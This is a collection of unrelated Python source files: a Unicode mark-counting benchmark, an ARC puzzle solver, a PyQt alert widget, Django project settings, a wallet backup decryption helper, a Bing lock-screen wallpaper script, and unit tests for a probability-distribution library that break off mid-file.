"\uA949",
"\uA94A",
"\uA94B",
"\uA94C",
"\uA94D",
"\uA94E",
"\uA94F",
"\uA950",
"\uA951",
"\uA980",
"\uA981",
"\uA982",
"\uA9B3",
"\uA9B6",
"\uA9B7",
"\uA9B8",
"\uA9B9",
"\uA9BC",
"\uAA29",
"\uAA2A",
"\uAA2B",
"\uAA2C",
"\uAA2D",
"\uAA2E",
"\uAA31",
"\uAA32",
"\uAA35",
"\uAA36",
"\uAA43",
"\uAA4C",
"\uAAB0",
"\uAAB2",
"\uAAB3",
"\uAAB4",
"\uAAB7",
"\uAAB8",
"\uAABE",
"\uAABF",
"\uAAC1",
"\uAAEC",
"\uAAED",
"\uAAF6",
"\uABE5",
"\uABE8",
"\uABED",
"\uFB1E",
"\uFE00",
"\uFE01",
"\uFE02",
"\uFE03",
"\uFE04",
"\uFE05",
"\uFE06",
"\uFE07",
"\uFE08",
"\uFE09",
"\uFE0A",
"\uFE0B",
"\uFE0C",
"\uFE0D",
"\uFE0E",
"\uFE0F",
"\uFE20",
"\uFE21",
"\uFE22",
"\uFE23",
"\uFE24",
"\uFE25",
"\uFE26",
"\U000101FD",
"\U00010A01",
"\U00010A02",
"\U00010A03",
"\U00010A05",
"\U00010A06",
"\U00010A0C",
"\U00010A0D",
"\U00010A0E",
"\U00010A0F",
"\U00010A38",
"\U00010A39",
"\U00010A3A",
"\U00010A3F",
"\U00011001",
"\U00011038",
"\U00011039",
"\U0001103A",
"\U0001103B",
"\U0001103C",
"\U0001103D",
"\U0001103E",
"\U0001103F",
"\U00011040",
"\U00011041",
"\U00011042",
"\U00011043",
"\U00011044",
"\U00011045",
"\U00011046",
"\U00011080",
"\U00011081",
"\U000110B3",
"\U000110B4",
"\U000110B5",
"\U000110B6",
"\U000110B9",
"\U000110BA",
"\U00011100",
"\U00011101",
"\U00011102",
"\U00011127",
"\U00011128",
"\U00011129",
"\U0001112A",
"\U0001112B",
"\U0001112D",
"\U0001112E",
"\U0001112F",
"\U00011130",
"\U00011131",
"\U00011132",
"\U00011133",
"\U00011134",
"\U00011180",
"\U00011181",
"\U000111B6",
"\U000111B7",
"\U000111B8",
"\U000111B9",
"\U000111BA",
"\U000111BB",
"\U000111BC",
"\U000111BD",
"\U000111BE",
"\U000116AB",
"\U000116AD",
"\U000116B0",
"\U000116B1",
"\U000116B2",
"\U000116B3",
"\U000116B4",
"\U000116B5",
"\U000116B7",
"\U00016F8F",
"\U00016F90",
"\U00016F91",
"\U00016F92",
"\U0001D167",
"\U0001D168",
"\U0001D169",
"\U0001D17B",
"\U0001D17C",
"\U0001D17D",
"\U0001D17E",
"\U0001D17F",
"\U0001D180",
"\U0001D181",
"\U0001D182",
"\U0001D185",
"\U0001D186",
"\U0001D187",
"\U0001D188",
"\U0001D189",
"\U0001D18A",
"\U0001D18B",
"\U0001D1AA",
"\U0001D1AB",
"\U0001D1AC",
"\U0001D1AD",
"\U0001D242",
"\U0001D243",
"\U0001D244",
"\U000E0100",
"\U000E0101",
"\U000E0102",
"\U000E0103",
"\U000E0104",
"\U000E0105",
"\U000E0106",
"\U000E0107",
"\U000E0108",
"\U000E0109",
"\U000E010A",
"\U000E010B",
"\U000E010C",
"\U000E010D",
"\U000E010E",
"\U000E010F",
"\U000E0110",
"\U000E0111",
"\U000E0112",
"\U000E0113",
"\U000E0114",
"\U000E0115",
"\U000E0116",
"\U000E0117",
"\U000E0118",
"\U000E0119",
"\U000E011A",
"\U000E011B",
"\U000E011C",
"\U000E011D",
"\U000E011E",
"\U000E011F",
"\U000E0120",
"\U000E0121",
"\U000E0122",
"\U000E0123",
"\U000E0124",
"\U000E0125",
"\U000E0126",
"\U000E0127",
"\U000E0128",
"\U000E0129",
"\U000E012A",
"\U000E012B",
"\U000E012C",
"\U000E012D",
"\U000E012E",
"\U000E012F",
"\U000E0130",
"\U000E0131",
"\U000E0132",
"\U000E0133",
"\U000E0134",
"\U000E0135",
"\U000E0136",
"\U000E0137",
"\U000E0138",
"\U000E0139",
"\U000E013A",
"\U000E013B",
"\U000E013C",
"\U000E013D",
"\U000E013E",
"\U000E013F",
"\U000E0140",
"\U000E0141",
"\U000E0142",
"\U000E0143",
"\U000E0144",
"\U000E0145",
"\U000E0146",
"\U000E0147",
"\U000E0148",
"\U000E0149",
"\U000E014A",
"\U000E014B",
"\U000E014C",
"\U000E014D",
"\U000E014E",
"\U000E014F",
"\U000E0150",
"\U000E0151",
"\U000E0152",
"\U000E0153",
"\U000E0154",
"\U000E0155",
"\U000E0156",
"\U000E0157",
"\U000E0158",
"\U000E0159",
"\U000E015A",
"\U000E015B",
"\U000E015C",
"\U000E015D",
"\U000E015E",
"\U000E015F",
"\U000E0160",
"\U000E0161",
"\U000E0162",
"\U000E0163",
"\U000E0164",
"\U000E0165",
"\U000E0166",
"\U000E0167",
"\U000E0168",
"\U000E0169",
"\U000E016A",
"\U000E016B",
"\U000E016C",
"\U000E016D",
"\U000E016E",
"\U000E016F",
"\U000E0170",
"\U000E0171",
"\U000E0172",
"\U000E0173",
"\U000E0174",
"\U000E0175",
"\U000E0176",
"\U000E0177",
"\U000E0178",
"\U000E0179",
"\U000E017A",
"\U000E017B",
"\U000E017C",
"\U000E017D",
"\U000E017E",
"\U000E017F",
"\U000E0180",
"\U000E0181",
"\U000E0182",
"\U000E0183",
"\U000E0184",
"\U000E0185",
"\U000E0186",
"\U000E0187",
"\U000E0188",
"\U000E0189",
"\U000E018A",
"\U000E018B",
"\U000E018C",
"\U000E018D",
"\U000E018E",
"\U000E018F",
"\U000E0190",
"\U000E0191",
"\U000E0192",
"\U000E0193",
"\U000E0194",
"\U000E0195",
"\U000E0196",
"\U000E0197",
"\U000E0198",
"\U000E0199",
"\U000E019A",
"\U000E019B",
"\U000E019C",
"\U000E019D",
"\U000E019E",
"\U000E019F",
"\U000E01A0",
"\U000E01A1",
"\U000E01A2",
"\U000E01A3",
"\U000E01A4",
"\U000E01A5",
"\U000E01A6",
"\U000E01A7",
"\U000E01A8",
"\U000E01A9",
"\U000E01AA",
"\U000E01AB",
"\U000E01AC",
"\U000E01AD",
"\U000E01AE",
"\U000E01AF",
"\U000E01B0",
"\U000E01B1",
"\U000E01B2",
"\U000E01B3",
"\U000E01B4",
"\U000E01B5",
"\U000E01B6",
"\U000E01B7",
"\U000E01B8",
"\U000E01B9",
"\U000E01BA",
"\U000E01BB",
"\U000E01BC",
"\U000E01BD",
"\U000E01BE",
"\U000E01BF",
"\U000E01C0",
"\U000E01C1",
"\U000E01C2",
"\U000E01C3",
"\U000E01C4",
"\U000E01C5",
"\U000E01C6",
"\U000E01C7",
"\U000E01C8",
"\U000E01C9",
"\U000E01CA",
"\U000E01CB",
"\U000E01CC",
"\U000E01CD",
"\U000E01CE",
"\U000E01CF",
"\U000E01D0",
"\U000E01D1",
"\U000E01D2",
"\U000E01D3",
"\U000E01D4",
"\U000E01D5",
"\U000E01D6",
"\U000E01D7",
"\U000E01D8",
"\U000E01D9",
"\U000E01DA",
"\U000E01DB",
"\U000E01DC",
"\U000E01DD",
"\U000E01DE",
"\U000E01DF",
"\U000E01E0",
"\U000E01E1",
"\U000E01E2",
"\U000E01E3",
"\U000E01E4",
"\U000E01E5",
"\U000E01E6",
"\U000E01E7",
"\U000E01E8",
"\U000E01E9",
"\U000E01EA",
"\U000E01EB",
"\U000E01EC",
"\U000E01ED",
"\U000E01EE",
"\U000E01EF",
]
# Every Unicode code point whose general category is a Mark (Mn, Mc, Me).
MARK_SET = {
    chr(code) for code in range(sys.maxunicode + 1)
    if unicodedata.category(chr(code)).startswith("M")
}
print("len(UNICODE_NSM) = {}".format(len(UNICODE_NSM)))
print("len(MARK_SET) = {}".format(len(MARK_SET)))
# Benchmark corpus: the first 10k characters of the Unicode character database.
filepath = "UnicodeData.txt"
with open(filepath) as f:
    text = f.read()
text = text[:10000]
def main():
    """Time each counting implementation against the shared ``text`` corpus."""
    # Reference answer; every candidate must reproduce it to count as correct.
    ground_truth = loop_count(text)
    functions = [ # (loop_count, 'loop_count'),
        # (generator_count, 'generator_count'),
        (category_count, "category_count"),
        (markset_count, "markset_count"),
    ]
    functions = functions[::-1]
    duration_list = {}
    for func, name in functions:
        is_correct = func(text) == ground_truth
        # 5000 repeats of 3 calls each: slow, but gives a stable distribution.
        durations = timeit.repeat(lambda: func(text), repeat=5000, number=3)
        if is_correct:
            correctness = "correct"
        else:
            correctness = "NOT correct"
        duration_list[name] = durations
        print(
            "{func:<20}: {correctness}, "
            "min: {min:0.3f}s, mean: {mean:0.3f}s, max: {max:0.3f}s".format(
                func=name,
                correctness=correctness,
                min=min(durations),
                mean=np.mean(durations),
                max=max(durations),
            )
        )
    create_boxplot(duration_list)
def create_boxplot(duration_list):
    """Render a horizontal boxplot of the timing distributions to output.png."""
    import operator
    import matplotlib.pyplot as plt
    import seaborn as sns
    plt.figure(num=None, figsize=(8, 4), dpi=300, facecolor="w", edgecolor="k")
    sns.set(style="whitegrid")
    # Fastest implementation first.
    ordered = sorted(duration_list.items(), key=operator.itemgetter(1))
    sorted_keys, sorted_vals = zip(*ordered)
    outlier_style = dict(markerfacecolor="0.75", markersize=1, linestyle="none")
    axes = sns.boxplot(data=sorted_vals, width=0.3, orient="h", flierprops=outlier_style)
    axes.set(xlabel="Time in s", ylabel="")
    plt.yticks(plt.yticks()[0], sorted_keys)
    plt.tight_layout()
    plt.savefig("output.png")
def generator_count(text):
    """Count the characters of ``text`` absent from the UNICODE_NSM list."""
    # Booleans sum as 0/1, so this counts the non-mark characters.
    return sum(char not in UNICODE_NSM for char in text)
def loop_count(text):
    """Count characters not in UNICODE_NSM with an explicit loop."""
    # 1769137 for the full corpus
    total = 0
    for char in text:
        if char not in UNICODE_NSM:
            total += 1
    return total
def markset_count(text):
    """Count characters of ``text`` that are not Unicode marks (via MARK_SET)."""
    non_marks = (char not in MARK_SET for char in text)
    return sum(non_marks)
def category_count(text):
    """Count characters whose category is not 'Mn' (nonspacing mark)."""
    total = 0
    for char in text:
        if unicodedata.category(char) != "Mn":
            total += 1
    return total
# Run the benchmark only when executed directly, not on import.
if __name__ == "__main__":
    main()
|
# -*- coding: utf-8 -*-
"""
Created on Tue Nov 26 09:27:11 2019
@author: Ronan Murphy 15397831
Assignment 3: Hand-coding solutions for the Abstraction and Reasoning Corpus
"""
import sys
import format_json as fj
"""
import sys and format json to give ability to read in json files
"""
"""
reads in the json files and splits the data into train and test
"""
# The ARC task file to solve is given as the first command-line argument.
file = str(sys.argv[1])
train_input,train_output,test_input,test_output = fj.read_file(file)
"""
solve method used to to convert input into output
reverse the input using the [::-1] function
then add the reversed input to the original ouput
using the extend function
append the array to another outter array to return the correct format
return this array
"""
def solve(inputs):
    """Mirror each grid: append its reversed rows to the original rows.

    Unlike the previous in-place ``extend``, the caller's grids are left
    untouched; every output grid is a fresh list in the required format.
    """
    out = []
    for grid in inputs:
        # Original rows followed by a reversed copy, without mutating input.
        out.append(grid + grid[::-1])
    return out
"""
Compares the input and output data calling the print_out function
"""
# Evaluate the solver against the train/test pairs and print the comparison.
fj.print_out(train_input, train_output, test_input, test_output, solve)
|
import typing
from typing import List, Union, Tuple
from PyQt5.QtCore import Qt
from PyQt5.QtWidgets import QWidget, QLabel, QVBoxLayout, QSizePolicy
from brainframe_qt.api_utils import api
from brainframe.api import bf_codecs
from brainframe_qt.ui.resources import stylesheet_watcher, QTAsyncWorker
from brainframe_qt.ui.resources.paths import qt_qss_paths
class AlertDetailUI(QWidget):
    """Widget layer: a word-wrapped label showing an alert's description."""

    def __init__(self, parent: QWidget):
        super().__init__(parent)
        # Backing store for the ``description`` property.
        self._description = ""
        self.alert_description_label = self._init_alert_description_label()
        self._init_layout()
        self._init_style()

    def _init_alert_description_label(self) -> QLabel:
        """Create the description label (word-wrapped, top-aligned)."""
        alert_description_label = QLabel(self._description, self)
        # Object name allows targeting from the QSS stylesheet.
        alert_description_label.setObjectName("alert_description")
        alert_description_label.setWordWrap(True)
        alert_description_label.setSizePolicy(QSizePolicy.Preferred,
                                              QSizePolicy.Expanding)
        alert_description_label.setAlignment(Qt.AlignTop)
        return alert_description_label

    def _init_layout(self):
        """Lay the description label out vertically, pinned to the top."""
        layout = QVBoxLayout()
        layout.setAlignment(Qt.AlignTop)
        layout.addWidget(self.alert_description_label)
        self.setLayout(layout)

    def _init_style(self) -> None:
        # Allow background of widget to be styled
        self.setAttribute(Qt.WA_StyledBackground, True)
        # Watcher re-applies the stylesheet when the QSS file changes on disk.
        stylesheet_watcher.watch(self, qt_qss_paths.alert_detail_qss)

    @property
    def description(self) -> str:
        """The alert description text currently shown."""
        return self._description

    @description.setter
    def description(self, description: str):
        # Keep the backing field and the label text in sync.
        self._description = description
        self.alert_description_label.setText(description)
class AlertDetail(AlertDetailUI):
    """Alert description widget that fills itself from the BrainFrame server."""

    def __init__(self, parent: QWidget):
        super().__init__(parent)
        self.alert = typing.cast(bf_codecs.Alert, None)

    def populate_from_server(self):
        """Fetch the alert's alarm and zone, then display them asynchronously."""
        if not self.alert:
            return

        def get_alert_info() -> Tuple[bf_codecs.ZoneAlarm, bf_codecs.Zone]:
            # Runs on the worker thread: two blocking API round-trips.
            alarm = api.get_zone_alarm(self.alert.alarm_id)
            return alarm, api.get_zone(alarm.zone_id)

        def handle_api_error(error):
            raise error

        worker = QTAsyncWorker(self, get_alert_info,
                               on_success=self.display_alert_info,
                               on_error=handle_api_error)
        worker.start()

    def display_alert_info(self, alarm_zone):
        """Build and show a description line for every alarm condition."""
        alarm, zone = alarm_zone
        pieces = []
        for condition in alarm.count_conditions + alarm.rate_conditions:
            template = self.tr('"{0}" in region "{1}"')
            pieces.append(template.format(repr(condition).strip(), zone.name))
        self.description = "".join(pieces)

    def set_alert(self, alert: bf_codecs.Alert) -> None:
        self.alert = alert
|
"""
Django settings for django_AUS project.
Generated by 'django-admin startproject' using Django 3.2.2.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
import os
from dotenv import load_dotenv
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
ENV_PATH = os.path.join(os.path.dirname(__file__), '.env')
load_dotenv(dotenv_path=ENV_PATH)
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# Prefer the DJANGO_SECRET_KEY environment variable; the insecure literal is
# only a development fallback, so existing deployments keep working.
SECRET_KEY = os.environ.get(
    "DJANGO_SECRET_KEY",
    'django-insecure-s-0zdu!w@9hc0vb@#wzxo0$ro%gd9pxzd^b^6(kdwswp*-*6qc',
)
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ["*"]
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
"emailapp",
'rest_framework',
'crispy_forms',
'django_forms_bootstrap',
'bootstrap4',
]
CRISPY_TEMPLATE_PACK = 'bootstrap4'
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'django_AUS.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [
os.path.join(BASE_DIR, 'templates'),
],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'django_AUS.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
CACHES = {
"default": {
"BACKEND": "django_redis.cache.RedisCache",
"LOCATION": "redis://127.0.0.1:6379/1",
"OPTIONS": {
"CLIENT_CLASS": "django_redis.client.DefaultClient"
},
"KEY_PREFIX": "rdb_"
}
}
DEFAULT_TIMEOUT = 60*60
REST_FRAMEWORK = {
'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.PageNumberPagination',
'PAGE_SIZE': 10,
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Asia/Kolkata'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
# Previously a 1-tuple created by a trailing comma; an explicit list is
# clearer and equally accepted by Django.
STATICFILES_DIRS = [os.path.join(BASE_DIR, "static")]
MEDIA_URL = '/media/'
MEDIA_ROOT = os.path.join(os.path.dirname(BASE_DIR), "media")
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
API_TOKEN = os.environ.get("API_TOKEN")
WEB_TOKEN = os.environ.get("WEB_TOKEN")
# Credentials for the three supported outbound e-mail services.
YASHI_MULTI_EMAIL_SERVICE_CONFIG = {
    # Amazon SES SMTP credentials
    "USERNAME_SMTP" : os.environ.get("USERNAME_SMTP"),
    "PASSWORD_SMTP" : os.environ.get("PASSWORD_SMTP"),
    # Google SMTP credentials
    "GOOGLE_SMTP_USERNAME" : os.environ.get("GOOGLE_SMTP_USERNAME"),
    "GOOGLE_SMTP_PASSWORD" :os.environ.get("GOOGLE_SMTP_PASSWORD"),
    # SendGrid API key.  NOTE(review): the key "SENDGRID_API_kEY" has a
    # lowercase 'k'; consumers may rely on this exact spelling, so it is
    # deliberately left unchanged here.
    "SENDGRID_API_kEY" : os.environ.get("SENDGRID_API_kEY"),
    # Shared sender identity (assuming sending e-mail works the same way
    # for all three services)
    "FROM_EMAIL": os.environ.get("FROM_EMAIL"),
    "FROM_EMAIL_NAME": os.environ.get("FROM_EMAIL_NAME")
}
|
import base64
import json
from blspy import PublicKeyMPL, SignatureMPL, AugSchemeMPL
from cryptography.fernet import Fernet
from src.util.byte_types import hexstr_to_bytes
from src.util.hash import std_hash
from src.wallet.derive_keys import master_sk_to_backup_sk
from src.wallet.util.wallet_types import WalletType
def open_backup_file(file_path, private_key):
    """Decrypt and verify a wallet backup file.

    The symmetric (Fernet) key is derived from ``private_key``'s backup
    child key, and the file's BLS signature is checked both against our own
    derived public key and against the pubkey recorded in the file's
    metadata.  Returns a dict with the decrypted "data" and the "meta_data".
    """
    backup_file_text = file_path.read_text()
    backup_file_json = json.loads(backup_file_text)
    meta_data = backup_file_json["meta_data"]
    meta_data_bytes = json.dumps(meta_data).encode()
    sig = backup_file_json["signature"]
    # The backup key is a dedicated child of the master secret key.
    backup_pk = master_sk_to_backup_sk(private_key)
    my_pubkey = backup_pk.get_g1()
    # The backup secret key bytes, base64-encoded, double as the Fernet key.
    key_base_64 = base64.b64encode(bytes(backup_pk))
    f = Fernet(key_base_64)
    encrypted_data = backup_file_json["data"].encode()
    # The signed message covers both the ciphertext and the metadata.
    msg = std_hash(encrypted_data) + std_hash(meta_data_bytes)
    signature = SignatureMPL.from_bytes(hexstr_to_bytes(sig))
    pubkey = PublicKeyMPL.from_bytes(hexstr_to_bytes(meta_data["pubkey"]))
    sig_match_my = AugSchemeMPL.verify(my_pubkey, msg, signature)
    sig_match_backup = AugSchemeMPL.verify(pubkey, msg, signature)
    # NOTE(review): `assert` is stripped under `python -O`; consider raising
    # an explicit exception for failed signature verification instead.
    assert sig_match_my is True
    assert sig_match_backup is True
    data_bytes = f.decrypt(encrypted_data)
    data_text = data_bytes.decode()
    data_json = json.loads(data_text)
    unencrypted = {}
    unencrypted["data"] = data_json
    unencrypted["meta_data"] = meta_data
    return unencrypted
def get_backup_info(file_path, private_key):
    """Decrypt a backup file and summarise its wallet list and metadata."""
    data = open_backup_file(file_path, private_key)["data"]
    # One summary dict per wallet entry; type_name resolves the enum label.
    wallets = [
        {
            "name": info["name"],
            "type": info["type"],
            "type_name": WalletType(info["type"]).name,
            "id": info["id"],
            "data": info["data"],
        }
        for info in data["wallet_list"]
    ]
    return {
        "version": data["version"],
        "fingerprint": data["fingerprint"],
        "timestamp": data["timestamp"],
        "wallets": wallets,
    }
|
###########################################################################
## ##
## GnomeBingLockScreen ##
## Copyright (C) 2018 张泽平 (Randy Hoffman) ##
## ##
## This program is free software: you can redistribute it and/or modify ##
## it under the terms of the GNU General Public License as published by ##
## the Free Software Foundation, either version 3 of the License, or ##
## (at your option) any later version. ##
## ##
## This program is distributed in the hope that it will be useful, ##
## but WITHOUT ANY WARRANTY; without even the implied warranty of ##
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the ##
## GNU General Public License for more details. ##
## ##
## You should have received a copy of the GNU General Public License ##
## along with this program. If not, see http://www.gnu.org/licenses/. ##
## ##
###########################################################################
## Author: 张泽平 (Randy Hoffman) ##
## Website/Contact: https://github.com/zhangzp9970/ ##
###########################################################################
#!/usr/bin/env python3
import json
import os
import urllib.request
import datetime
# Today's date names the downloaded file; pictures a week old are candidates
# for deletion.
date=datetime.datetime.now().strftime('%Y-%m-%d')
day_s=datetime.datetime.now()-datetime.timedelta(days = 7)
day=day_s.strftime('%Y-%m-%d')
# Bing's image-of-the-day metadata endpoint (US market, latest image only).
json_url="https://www.bing.com/HPImageArchive.aspx?format=js&idx=0&n=1&mkt=en-US"
bing_url="https://www.bing.com"
HOME=os.path.expandvars('$HOME')+"/"
# Metadata cache (hidden dot-file) and the wallpaper directory/paths.
json_file=HOME+".bing.json"
directory=HOME+"Pictures/Bing"
picture=directory+"/"+date+".jpg"
picture_del=directory+"/"+day+".jpg"
# Set to False to keep week-old wallpapers.
delete_old_picture = True
# Create the pictures directory on first run.
if not os.path.exists(directory):
    os.makedirs(directory)
if not os.path.exists(picture):
    # Get the JSON metadata describing today's image (cached as a dot-file).
    urllib.request.urlretrieve(json_url, json_file)
    # Open the file and extract the image URL from the JSON payload.
    with open(json_file, "rb") as f:
        bing_json = json.load(f)
    url = bing_url + bing_json['images'][0]['url']
    # Download the picture itself.
    urllib.request.urlretrieve(url, picture)
    # Point the GNOME screensaver at the new image.  The path is quoted so a
    # $HOME containing spaces does not break the shell command.
    cmd = 'gsettings set org.gnome.desktop.screensaver picture-uri "file:' + picture + '"'
    os.system(cmd)
# Remove the week-old wallpaper, if deletion is enabled and it exists.
if delete_old_picture and os.path.exists(picture_del):
    os.remove(picture_del)
from __future__ import division
from __future__ import print_function
from nose.tools import assert_almost_equal, assert_equal, assert_raises, \
assert_true
from dit import Distribution, ScalarDistribution
from dit.distribution import BaseDistribution
from dit.exceptions import ditException, InvalidNormalization
def test_dist_iter1():
    """Iterating a Distribution yields its outcomes, in order."""
    outcomes = ['00', '01', '10', '11']
    d = Distribution(outcomes, [1/4]*4)
    for outcome in d:
        assert_true(outcome in outcomes)
    for got, expected in zip(d, outcomes):
        assert_equal(got, expected)
def test_dist_iter2():
    """reversed() walks the outcomes back-to-front."""
    outcomes = ['00', '01', '10', '11']
    d = Distribution(outcomes, [1/4]*4)
    for outcome in reversed(d):
        assert_true(outcome in outcomes)
    for got, expected in zip(reversed(d), reversed(outcomes)):
        assert_equal(got, expected)
def test_numerical():
    """A float-pmf distribution reports itself as numerical."""
    d = Distribution(['00', '01', '10', '11'], [1/4]*4)
    assert_true(d.is_numerical())
def test_rand():
    """rand() always returns one of the distribution's outcomes.

    Rewritten from a nose 'yield' generator test (silently skipped by
    modern pytest) into a plain loop of assertions.
    """
    outcomes = ['00', '01', '10', '11']
    pmf = [1/4]*4
    d = Distribution(outcomes, pmf)
    for _ in range(10):
        assert_true(d.rand() in outcomes)
def test_to_dict():
    """to_dict() maps every outcome to its probability.

    Rewritten from a nose 'yield' generator test (silently skipped by
    modern pytest) into plain assertions.
    """
    outcomes = ['00', '01', '10', '11']
    pmf = [1/4]*4
    d = Distribution(outcomes, pmf)
    for outcome, prob in d.to_dict().items():
        assert_almost_equal(d[outcome], prob)
def test_validate1():
    """A uniform distribution validates via the method and the base class."""
    d = Distribution(['00', '01', '10', '11'], [1/4]*4)
    assert_true(d.validate())
    assert_true(BaseDistribution.validate(d))
def test_validate2():
    """Zeroing one probability breaks normalization and fails validation."""
    dist = Distribution(['00', '01', '10', '11'], [1/4]*4)
    dist['00'] = 0
    assert_raises(InvalidNormalization, dist.validate)
    assert_raises(InvalidNormalization, BaseDistribution.validate, dist)
def test_zipped1():
    """An invalid zipped() mode raises once the iterator is consumed."""
    dist = Distribution(['00', '01', '10', '11'], [1/4]*4)
    bad_iterator = dist.zipped(mode='pants')
    assert_raises(ditException, list, bad_iterator)
def test_to_string1():
    """Default to_string() rendering of a uniform joint distribution."""
    dist = Distribution(['00', '01', '10', '11'], [1/4]*4)
    expected = """Class: Distribution
Alphabet: ('0', '1') for all rvs
Base: linear
Outcome Class: str
Outcome Length: 2
RV Names: None
x p(x)
00 0.25
01 0.25
10 0.25
11 0.25"""
    assert_equal(dist.to_string(), expected)
def test_to_string2():
    """to_string(exact=True) renders probabilities as fractions."""
    dist = Distribution(['00', '01', '10', '11'], [1/4]*4)
    expected = """Class: Distribution
Alphabet: ('0', '1') for all rvs
Base: linear
Outcome Class: str
Outcome Length: 2
RV Names: None
x p(x)
00 1/4
01 1/4
10 1/4
11 1/4"""
    assert_equal(dist.to_string(exact=True), expected)
def test_to_string3():
    """print(dist) writes the to_string() rendering to stdout."""
    dist = Distribution(['00', '01', '10', '11'], [1/4]*4)
    expected = """Class: Distribution
Alphabet: ('0', '1') for all rvs
Base: linear
Outcome Class: str
Outcome Length: 2
RV Names: None
x p(x)
00 0.25
01 0.25
10 0.25
11 0.25"""
    # context manager?
    import sys
    from six import StringIO
    captured = StringIO()
    saved_stdout = sys.stdout
    try:
        sys.stdout = captured
        print(dist, end='')
    finally:
        sys.stdout = saved_stdout
    captured.seek(0)
    assert_equal(captured.read(), expected)
def test_to_string4():
    """Rendering after marginalizing down to the first variable."""
    dist = Distribution(['00', '01', '10', '11'], [1/4]*4)
    marginal = dist.marginal([0])
    expected = """Class: Distribution
Alphabet: ('0', '1') for all rvs
Base: linear
Outcome Class: str
Outcome Length: 1
RV Names: None
x p(x)
0 0.5
1 0.5"""
    assert_equal(marginal.to_string(), expected)
def test_to_string5():
    """show_mask=True marks the marginalized-away variable with '*'."""
    dist = Distribution(['00', '01', '10', '11'], [1/4]*4)
    marginal = dist.marginal([0])
    expected = """Class: Distribution
Alphabet: ('0', '1') for all rvs
Base: linear
Outcome Class: str
Outcome Length: 1 (mask: 2)
RV Names: None
x p(x)
0* 0.5
1* 0.5"""
    assert_equal(marginal.to_string(show_mask=True), expected)
def test_to_string6():
    """digits=1 truncates the displayed probabilities."""
    dist = Distribution(['00', '01', '10', '11'], [1/4]*4)
    expected = """Class: Distribution
Alphabet: ('0', '1') for all rvs
Base: linear
Outcome Class: str
Outcome Length: 2
RV Names: None
x p(x)
00 0.2
01 0.2
10 0.2
11 0.2"""
    assert_equal(dist.to_string(digits=1), expected)
def test_to_string7():
    """ScalarDistribution rendering omits the joint-only header lines."""
    dist = ScalarDistribution(['00', '01', '10', '11'], [1/4]*4)
    expected = """Class: ScalarDistribution
Alphabet: ('00', '01', '10', '11')
Base: linear
x p(x)
00 0.25
01 0.25
10 0.25
11 0.25"""
    assert_equal(dist.to_string(), expected)
def test_to_string8():
    """A custom mask character can be supplied via show_mask."""
    dist = Distribution(['00', '01', '10', '11'], [1/4]*4)
    marginal = dist.marginal([0])
    expected = """Class: Distribution
Alphabet: ('0', '1') for all rvs
Base: linear
Outcome Class: str
Outcome Length: 1 (mask: 2)
RV Names: None
x p(x)
0! 0.5
1! 0.5"""
    assert_equal(marginal.to_string(show_mask='!'), expected)
def test_to_string9():
    """In base 2 the rendering switches to log probabilities."""
    dist = Distribution(['00', '01', '10', '11'], [1/4]*4)
    dist.set_base(2)
    expected = """Class: Distribution
Alphabet: ('0', '1') for all rvs
Base: 2
Outcome Class: str
Outcome Length: 2
RV Names: None
x log p(x)
00 -2.0
01 -2.0
10 -2.0
11 -2.0"""
    assert_equal(dist.to_string(), expected)
def test_to_string10():
    """An empty (unvalidated) distribution renders only the header."""
    dist = ScalarDistribution([], sample_space=[0, 1], validate=False)
    expected = """Class: ScalarDistribution
Alphabet: (0, 1)
Base: 2
x log p(x)"""
    assert_equal(dist.to_string(), expected)
def test_prepare_string1():
    """show_mask is not supported for a ScalarDistribution."""
    dist = ScalarDistribution(['00', '01', '10', '11'], [1/4]*4)
    from dit.distribution import prepare_string
    assert_raises(ditException, prepare_string, dist, show_mask=True)
def test_prepare_string2():
    """str_outcomes is not supported for a ScalarDistribution."""
    dist = ScalarDistribution(['00', '01', '10', '11'], [1/4]*4)
    from dit.distribution import prepare_string
    assert_raises(ditException, prepare_string, dist, str_outcomes=True)
def test_prepare_string3():
